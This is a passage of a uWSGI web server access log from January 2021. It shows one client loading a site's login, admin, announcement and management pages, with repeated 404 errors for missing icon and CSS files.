bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2105] 180.160.49.168 () {40 vars in 816 bytes} [Thu Jan 14 11:37:15 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1672/2106] 180.160.49.168 () {40 vars in 875 bytes} [Thu Jan 14 11:37:21 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1673/2107] 180.160.49.168 () {40 vars in 882 bytes} [Thu Jan 14 11:37:22 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1674/2108] 180.160.49.168 () {48 vars in 968 bytes} [Thu Jan 14 11:37:26 2021] POST /my-admin/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1675/2109] 180.160.49.168 () {40 vars in 889 bytes} [Thu Jan 14 11:37:26 2021] GET /admin-home/ => generated 11262 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2110] 180.160.49.168 () {40 vars in 878 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2111] 180.160.49.168 () {40 vars in 812 bytes} [Thu Jan 14 11:37:26 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2112] 180.160.49.168 () {40 vars in 841 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2113] 180.160.49.168 () {40 vars in 824 bytes} [Thu Jan 14 11:37:26 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2114] 180.160.49.168 () {40 vars in 853 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2115] 180.160.49.168 () {40 vars in 859 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1676/2116] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1677/2117] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1678/2118] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1679/2119] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1680/2120] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1681/2121] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1682/2122] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 11:37:26 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1683/2123] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 11:37:26 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1684/2124] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2125] 180.160.49.168 () {40 vars in 881 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2126] 180.160.49.168 () {40 vars in 805 bytes} [Thu Jan 14 11:37:26 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2127] 180.160.49.168 () {40 vars in 793 bytes} [Thu Jan 14 11:37:26 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2128] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2129] 180.160.49.168 () {40 vars in 817 bytes} [Thu Jan 14 11:37:26 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2130] 180.160.49.168 () {40 vars in 803 bytes} [Thu Jan 14 11:37:26 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1685/2131] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 11:37:32 2021] GET /announcement/ => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1686/2132] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 11:37:32 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1687/2133] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 11:37:32 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1688/2134] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 11:37:32 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1689/2135] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 11:37:32 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1691/2136] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 11:37:32 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 38 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1692/2137] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 11:37:32 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1692/2138] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:32 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 28 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1693/2139] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:32 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1694/2140] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 11:37:32 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1695/2141] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 11:37:34 2021] GET /kind-manage/ => generated 13023 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1696/2142] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 11:37:34 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1697/2143] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 11:37:34 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1698/2144] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 11:37:34 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1699/2145] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 11:37:34 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1700/2146] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:34 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1701/2147] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:34 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1702/2148] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 11:37:34 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1703/2149] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 11:37:34 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1704/2150] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 11:37:34 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1705/2151] 180.160.49.168 () {40 vars in 896 bytes} [Thu Jan 14 11:37:35 2021] GET /announcement/ => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1706/2152] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 11:37:35 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1707/2153] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 11:37:35 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1708/2154] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 11:37:35 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1709/2155] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 11:37:35 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1710/2156] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:35 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1711/2157] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:35 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 31 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1712/2158] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 11:37:35 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1713/2159] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 11:37:35 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1714/2160] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 11:37:35 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1716/2161] 180.160.49.168 () {40 vars in 898 bytes} [Thu Jan 14 11:38:26 2021] GET /announcement/? => generated 7421 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1716/2162] 180.160.49.168 () {48 vars in 981 bytes} [Thu Jan 14 11:38:26 2021] POST /announcement/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1717/2163] 180.160.49.168 () {40 vars in 897 bytes} [Thu Jan 14 11:38:26 2021] GET /announcement/ => generated 8278 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1718/2164] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 11:38:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1719/2165] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 11:38:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1720/2166] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 11:38:26 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1721/2167] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 11:38:26 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1722/2168] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:38:26 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1723/2169] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:38:26 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1724/2170] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 11:38:26 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1725/2171] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 11:38:26 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1726/2172] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 11:38:26 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1728/2173] 180.160.49.168 () {40 vars in 898 bytes} [Thu Jan 14 11:38:54 2021] GET /announcement/? => generated 8278 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1728/2174] 180.160.49.168 () {48 vars in 981 bytes} [Thu Jan 14 11:38:54 2021] POST /announcement/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1729/2175] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 11:38:54 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1730/2176] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 11:38:54 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1731/2177] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 11:38:54 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1733/2178] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:38:54 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 37 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1734/2179] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 11:38:54 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1734/2180] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 11:38:54 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 36 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1735/2181] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:38:54 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1736/2182] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 11:38:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1737/2183] 180.160.49.168 () {38 vars in 768 bytes} [Thu Jan 14 11:38:54 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1738/2184] 180.160.49.168 () {40 vars in 896 bytes} [Thu Jan 14 11:38:56 2021] GET /announcement/ => generated 9146 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1739/2185] 180.160.49.168 () {38 vars in 835 bytes} [Thu Jan 14 11:38:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1740/2186] 180.160.49.168 () {38 vars in 847 bytes} [Thu Jan 14 11:38:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1741/2187] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 11:38:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1742/2188] 180.160.49.168 () {38 vars in 839 bytes} [Thu Jan 14 11:38:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1743/2189] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 11:38:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1744/2190] 180.160.49.168 () {38 vars in 803 bytes} [Thu Jan 14 11:38:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 661|app: 0|req: 1745/2191] 180.160.49.168 () {38 vars in 879 bytes} [Thu Jan 14 11:38:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 661|app: 0|req: 1746/2192] 180.160.49.168 () {38 vars in 771 bytes} [Thu Jan 14 11:38:56 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 661|app: 0|req: 1747/2193] 180.160.49.168 () {38 vars in 769 bytes} [Thu Jan 14 11:38:56 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1748/2194] 180.160.49.168 () {40 vars in 892 bytes} [Thu Jan 14 11:39:03 2021] GET /admin-home/ => generated 11262 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 661|app: 0|req: 1749/2195] 180.160.49.168 () {38 vars in 835 bytes} [Thu Jan 14 11:39:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 661|app: 0|req: 1750/2196] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 11:39:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 661|app: 0|req: 1751/2197] 180.160.49.168 () {38 vars in 839 bytes} [Thu Jan 14 11:39:03 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 661|app: 0|req: 1752/2198] 180.160.49.168 () {38 vars in 803 bytes} [Thu Jan 14 11:39:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 661|app: 0|req: 1753/2199] 180.160.49.168 () {38 vars in 823 bytes} [Thu Jan 14 11:39:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 661|app: 0|req: 1754/2200] 180.160.49.168 () {38 vars in 847 bytes} [Thu Jan 14 11:39:03 2021] GET 